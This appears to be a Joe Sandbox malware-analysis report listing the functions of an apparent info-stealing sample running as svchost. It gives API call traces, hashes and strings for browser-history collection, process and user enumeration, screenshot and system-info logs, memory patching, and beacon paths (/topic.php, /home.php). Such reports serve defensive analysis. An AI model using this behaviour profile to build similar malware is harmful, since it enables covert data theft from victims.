                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                                • API String ID: 757183407-427538202
                                                                                                                                                                                                                • Opcode ID: aca6b1c0fc6e2d39b412efee17ca00d00b3818a49d0a57af8e359a25e5891054
                                                                                                                                                                                                                • Instruction ID: 128cfb9fd8ca8817552295f07d93c77e22fed18d1774453d0adf77548755c5d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aca6b1c0fc6e2d39b412efee17ca00d00b3818a49d0a57af8e359a25e5891054
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516771A81308BBFB309B949C4AFEEBB78EF45B44F504544F701AA1C1D7F06A548BA9
                                                                                                                                                                                                                Function 02BCA350 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA376
                                                                                                                                                                                                                • GetThreadPriority.KERNEL32(00000000,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA37D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BCA386
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000040,?,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA3A7
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02BCA3C6
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02BCA3E2
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02BCA3F8
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02BCA406
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA411
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02BCA424
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02BCA435
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02BCA444
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02BCA453
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02BCA462
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000006,?), ref: 02BCA46A
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02BCA47D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02BCA48E
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02BCA49D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA4A9
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02BCA4B3
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4BB
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA4C2
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2984368831-0
                                                                                                                                                                                                                • Opcode ID: 14d2e6fa02e86fc0251e8f8c704f311d44a7bc6cdd0bb4c0c96774fa4bec9a69
                                                                                                                                                                                                                • Instruction ID: f7c71a103ccc7892c38f7103a7c162f61ca3cff32fec252707734791691db138
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d2e6fa02e86fc0251e8f8c704f311d44a7bc6cdd0bb4c0c96774fa4bec9a69
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45518371940619AFE710AF74CC46FAE77ACFF49310F154928FA86E7180DB78A9518BA0
                                                                                                                                                                                                                Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                                Function 02BB44D0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 194memoryprocessCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,75573490), ref: 02BB450E
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB45A0
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB45A7
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB45BB
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02BB45EC
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02BB4603
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB466C
                                                                                                                                                                                                                • Process32Next.KERNEL32(?,?), ref: 02BB467B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                                • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                                • API String ID: 3808533164-4214784430
                                                                                                                                                                                                                • Opcode ID: 0d6f9158cccc2bd74a7641d2d27d2cc3ab6dcf22d15553ee7b8213a74c00932d
                                                                                                                                                                                                                • Instruction ID: 0b41002a3ed498973d0161b948d3fe520fb2818fb4ef37389bb6620eadeeb615
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d6f9158cccc2bd74a7641d2d27d2cc3ab6dcf22d15553ee7b8213a74c00932d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F61F571904345AFD711CF78D858AEBBBE8FF84354F4489A8FA8587242E7B0D808CB91
                                                                                                                                                                                                                Function 02BD8890 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 02BD88B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleInformationType
                                                                                                                                                                                                                • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                                • API String ID: 4064226416-1748840775
                                                                                                                                                                                                                • Opcode ID: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                                • Instruction ID: ca15629dbedd83c84a11be676ac98152bde204400b5730f0db2fd86f0de96b0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D518F71D40219ABEB24CFA4DC89BFEBB78FB44701F504569FA14EB180E774A941CB91
                                                                                                                                                                                                                Function 02BB4710 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 185memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,75573490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02BB5903,00000000,00000000), ref: 02BB4841
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4884
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,02BB5904,00000000), ref: 02BB4896
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BB5903,02BB5904,00000000,00000000), ref: 02BB48A8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,02BB5904,00000000), ref: 02BB48B8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BB5903), ref: 02BB48C7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB48CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BB5903), ref: 02BB48D7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB48DA
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB48ED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$FreeProcess$Buffer$AllocDisplayInformationLockPointerQueryUnlockValidateWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: %S$netuser{
                                                                                                                                                                                                                • API String ID: 37011087-3648794683
                                                                                                                                                                                                                • Opcode ID: 4cb70a6c8559afe7bb30c4fa43126952b24a3df2a1ca27fa3a5eb4ade02dacea
                                                                                                                                                                                                                • Instruction ID: e8124d959eacc7fd7ead620d3b59ce964f40fe71546b1c317f72c1cf1de9f150
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb70a6c8559afe7bb30c4fa43126952b24a3df2a1ca27fa3a5eb4ade02dacea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5351E275D40259ABDB218FA4DC58BFEBBB8FF49740F508594FA41A7281D7B09904CBA0
                                                                                                                                                                                                                Function 02BB3DC7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 233timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3DED
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3E23
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3E57
                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 02BB3EA0
                                                                                                                                                                                                                • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 02BB3EC0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3EE5
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3F37
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3FB7
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4,00000000,?), ref: 02BB404B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                  • Part of subcall function 02BB79C0: SetFileAttributesA.KERNEL32(00000000,00000000,02BC8ECD,?,?,?,?,?,?), ref: 02BB79C8
                                                                                                                                                                                                                  • Part of subcall function 02BB79C0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79CF
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02BB4072
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                                • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                                • API String ID: 203013662-44577846
                                                                                                                                                                                                                • Opcode ID: 32415920875d17c98bb552a662c9e73db340c7d5670ac3349a897d4500ffbed2
                                                                                                                                                                                                                • Instruction ID: c5db08fb451bcc7777c2f998232d7a9922353337cf2e617e00f8e0cd9dfdf964
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32415920875d17c98bb552a662c9e73db340c7d5670ac3349a897d4500ffbed2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B67139316006465FDB26DB3C58A47FABBF5EF85300F5441D4E98AEB240DBB1AE48CB80
                                                                                                                                                                                                                Function 02BB63F0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$strstrstrtol
                                                                                                                                                                                                                • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                                • API String ID: 600650289-3097137778
                                                                                                                                                                                                                • Opcode ID: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                                • Instruction ID: 8ee7fbeca3c9419a6d255ef3a4d546c1bdcf1295b1c9e212ebfe8d6b2ac355af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98715731E442585BDB62CB789C81BEEBBB9AF48700F1444E8EB49A3281D3B45E55CB60
                                                                                                                                                                                                                Function 02BC3800 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3821
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC383C
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,?,75570F00,00000000,00000000), ref: 02BC3856
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,75570F00,00000000,00000000), ref: 02BC386C
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38BB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38C2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38CE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38D5
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,75570F00), ref: 02BC394D
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,75570F00,00000000,00000000), ref: 02BC395A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC3998
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC399B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC39A7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC39AA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: /topic.php
                                                                                                                                                                                                                • API String ID: 870369024-224703247
                                                                                                                                                                                                                • Opcode ID: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                                • Instruction ID: 26365d6943e4f01155cc054d040b91784f609f369db0af8e6a5ed619f49a38f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 365117B29441186BCB349B749C88EEBBBBCEB44300F9489DDF756D7140D7B19D848BA0
                                                                                                                                                                                                                Function 02BCA1B0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 130filethreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BCA1CA
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BCA1D7
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02BCA1F4
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02BCA23E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCA256
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCA267
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 02BCA279
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BCA291
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BCA2B1
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02BCA327
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCA334
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: %53%59%53%54%45%4D%21%31%31%34%31%32%37%21%30%32%39%36%43%44%43%30$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                                • API String ID: 1291007772-917243317
                                                                                                                                                                                                                • Opcode ID: 359a8cbc3885d1a87f32b14dbcab757fbb2c65f05758bc98149ea850ee801541
                                                                                                                                                                                                                • Instruction ID: 7126f4abbb2175ad21ff2f71c5131645bae63e7bf1a1feeccad054480074d7e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 359a8cbc3885d1a87f32b14dbcab757fbb2c65f05758bc98149ea850ee801541
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6419271A8021C7BEB24DBA4CC49FEA777DEB44700F5045D8BB05EB180EAF19A848F60
                                                                                                                                                                                                                Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
